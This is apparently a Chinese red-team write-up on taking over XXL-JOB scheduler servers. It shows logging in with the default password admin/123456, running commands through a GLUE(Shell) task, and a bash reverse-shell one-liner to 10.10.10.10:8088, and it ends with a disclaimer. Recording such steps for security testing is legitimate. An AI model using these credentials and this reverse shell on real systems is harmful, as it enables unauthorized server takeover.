写在前面
今天下午红队内网刚遇到的漏洞,xxl-job本身是由默认弱口令admin/123456,这个系统改过密码是其他途径拿到的通用口令。感觉漏洞性质跟zabbix登录后台以后RCE性质差不多,有点炒冷饭了,记录一下步骤。
目录
0x01 漏洞原理
0x02 影响版本
0x03 利用步骤
0x04 参考
漏洞原理
XXL-JOB分布式任务调度平台是一个轻量级分布式任务调度平台,使用JAVA语言研发,使用其可以轻松的实现分布式任务调度,任务管理、执行、监控等功能,在国内颇受欢迎,目前已有多家公司接入xxl-job。
获取后台权限可以管理所有的任务管理,甚至可以执行指令,接管服务器。
影响版本
所有已知版本
利用步骤
利用通用弱口令登录admin/123456
在任务管理栏目点击新增任务
如图配置,选择GLUE(Shell),完成后保存
完成后点击GLUE IDE
进入编辑界面,输入需要执行的命令
编辑结束后点击执行一次,在点击调度日志查看执行结果
点击执行日志查看结果
成功执行指令
可以将这里的whoami修改为反弹shell实现控制服务器,其他步骤同上
bash -c 'exec bash -i >& /dev/tcp/10.10.10.10/8088 <&1
参考
https://www.jianshu.com/p/dfeb7f9692c6
写在最后
本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。